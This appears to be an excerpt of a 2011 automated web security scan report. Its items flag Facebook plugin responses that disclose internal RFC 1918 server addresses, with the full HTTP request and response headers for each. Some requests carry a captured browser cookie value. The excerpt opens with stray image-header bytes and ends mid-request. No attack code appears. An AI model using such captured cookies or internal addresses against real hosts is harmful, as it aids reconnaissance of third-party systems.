GIF89a . ................!..NETSCAPE2.0.....!..XMP DataXMP<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/
...[SNIP]...
28.71. http://www.facebook.com/plugins/activity.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/activity.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/activity.php?site=www.allatsea.net&width=300&height=300&header=true&colorscheme=light HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://allatsea.net/directclassifieds.php?menuCategories=8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.115.110
X-Cnection: close
Date: Fri, 06 May 2011 21:10:39 GMT
Content-Length: 11692

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
28.72. http://www.facebook.com/plugins/activity.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/activity.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/activity.php?site=www.allatsea.net&width=300&height=300&header=true&colorscheme=light HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://allatsea.net/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.115.132
X-Cnection: close
Date: Fri, 06 May 2011 21:06:47 GMT
Content-Length: 11652

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
28.73. http://www.facebook.com/plugins/activity.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/activity.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/activity.php?site=www.allatsea.net&width=300&height=300&header=true&colorscheme=light HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://allatsea.net/directclassifieds.php?menuCategories=8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.101.111
X-Cnection: close
Date: Fri, 06 May 2011 21:10:29 GMT
Content-Length: 11692

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
28.74. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=www.facebook.com%2Fexpedia&layout=button_count&show_faces=false&width=90&action=like&colorscheme=light&height=21&ref=header HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.facebook.com

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-XSS-Protection: 0
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.105.63
X-Cnection: close
Date: Sat, 07 May 2011 02:42:42 GMT
Content-Length: 7097

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
28.75. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=www.facebook.com%2Fexpedia&layout=button_count&show_faces=false&width=90&action=like&colorscheme=light&height=21&ref=header HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.facebook.com

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-XSS-Protection: 0
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.43.122.55
X-Cnection: close
Date: Fri, 06 May 2011 22:42:06 GMT
Content-Length: 7101

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
28.76. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=www.facebook.com%2Fexpedia&layout=button_count&show_faces=false&width=90&action=like&colorscheme=light&height=21&ref=header HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.facebook.com

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-XSS-Protection: 0
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.27.156.103
X-Cnection: close
Date: Sat, 07 May 2011 02:54:37 GMT
Content-Length: 7095

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
28.77. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=www.facebook.com%2Fexpedia&layout=button_count&show_faces=false&width=90&action=like&colorscheme=light&height=21&ref=header HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.facebook.com

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-XSS-Protection: 0
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.43.115.31
X-Cnection: close
Date: Fri, 06 May 2011 22:42:00 GMT
Content-Length: 7101

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
28.78. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=www.facebook.com%2Fexpedia&layout=button_count&show_faces=false&width=90&action=like&colorscheme=light&height=21&ref=header HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.facebook.com

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-XSS-Protection: 0
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.28.32.125
X-Cnection: close
Date: Sat, 07 May 2011 02:55:24 GMT
Content-Length: 7095

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
28.79. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=www.facebook.com%2Fexpedia&layout=button_count&show_faces=false&width=90&action=like&colorscheme=light&height=21&ref=header HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.facebook.com

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-XSS-Protection: 0
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.223.41
X-Cnection: close
Date: Fri, 06 May 2011 22:41:56 GMT
Content-Length: 7101

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
28.80. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=www.facebook.com%2Fexpedia&layout=button_count&show_faces=false&width=90&action=like&colorscheme=light&height=21&ref=header HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://support.expedia.com/app/home/uurl/http%3A%2F%2Fwww.expedia.com%2Fpub%2Fagent.dll%3Fqscr%3Dflex%26subm%3D1%26city%3DAUS%26citd%3DDTW%26date1%3D%26mnth%3D5%2F1%2F2011%26rgst%3D1%26rged%3D10%26fxst%3D0%26load%3D1%26cAdu%3D1%26rfrr%3D-429%3F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.192.23
X-Cnection: close
Date: Fri, 06 May 2011 22:40:15 GMT
Content-Length: 7137

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
28.81. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=www.facebook.com%2Fexpedia&layout=button_count&show_faces=false&width=90&action=like&colorscheme=light&height=21&ref=header HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.facebook.com

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-XSS-Protection: 0
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.27.172.131
X-Cnection: close
Date: Sat, 07 May 2011 02:50:44 GMT
Content-Length: 7095

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
28.82. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=www.facebook.com%2Fexpedia&layout=button_count&show_faces=false&width=90&action=like&colorscheme=light&height=21&ref=header HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.facebook.com

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-XSS-Protection: 0
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.40.109
X-Cnection: close
Date: Fri, 06 May 2011 22:46:28 GMT
Elapsed: 0.058
Content-Length: 7099

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
28.83. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=www.facebook.com%2Fexpedia&layout=button_count&show_faces=false&width=90&action=like&colorscheme=light&height=21&ref=header HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/pub/agent.dll?qscr=flex&subm=1&city=AUS&citd=DTW&date1=&mnth=5/1/2011&rgst=1&rged=10&fxst=0&load=1&cAdu=1&rfrr=-429
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.100.51
X-Cnection: close
Date: Fri, 06 May 2011 22:36:09 GMT
Content-Length: 6882

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
28.84. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=www.facebook.com%2Fexpedia&layout=button_count&show_faces=false&width=90&action=like&colorscheme=light&height=21&ref=header HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://support.expedia.com/app/answers/list/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.196.57
X-Cnection: close
Date: Fri, 06 May 2011 22:40:28 GMT
Content-Length: 6777

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
28.85. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=www.facebook.com%2Fexpedia&layout=button_count&show_faces=false&width=90&action=like&colorscheme=light&height=21&ref=header HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.facebook.com

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-XSS-Protection: 0
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.27.84.114
X-Cnection: close
Date: Sat, 07 May 2011 02:44:44 GMT
Content-Length: 7095

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
28.86. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=www.facebook.com%2Fexpedia&layout=button_count&show_faces=false&width=90&action=like&colorscheme=light&height=21&ref=header HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.facebook.com

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-XSS-Protection: 0
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.27.189.128
X-Cnection: close
Date: Sat, 07 May 2011 02:55:20 GMT
Content-Length: 7095

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
28.87. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=www.facebook.com%2Fexpedia&layout=button_count&show_faces=false&width=90&action=like&colorscheme=light&height=21&ref=header HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.facebook.com

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-XSS-Protection: 0
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.43.127.35
X-Cnection: close
Date: Fri, 06 May 2011 22:42:00 GMT
Content-Length: 7101

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
28.88. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=www.facebook.com%2Fexpedia&layout=button_count&show_faces=false&width=90&action=like&colorscheme=light&height=21&ref=header HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.facebook.com

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-XSS-Protection: 0
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.27.72.104
X-Cnection: close
Date: Sat, 07 May 2011 02:45:25 GMT
Content-Length: 7095

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
28.89. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=www.facebook.com%2Fexpedia&layout=button_count&show_faces=false&width=90&action=like&colorscheme=light&height=21&ref=header HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.facebook.com

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-XSS-Protection: 0
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.27.155.107
X-Cnection: close
Date: Sat, 07 May 2011 02:50:41 GMT
Content-Length: 7095

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
28.90. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?api_key=131538103586818&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df36e65b24c%26origin%3Dhttp%253A%252F%252Fwww.expedia.com%252Ffa054297%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Ffacebook.com%2Fexpedia&layout=standard&locale=en_US&node_type=link&sdk=joey&show_faces=true&width=340 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/default.asp
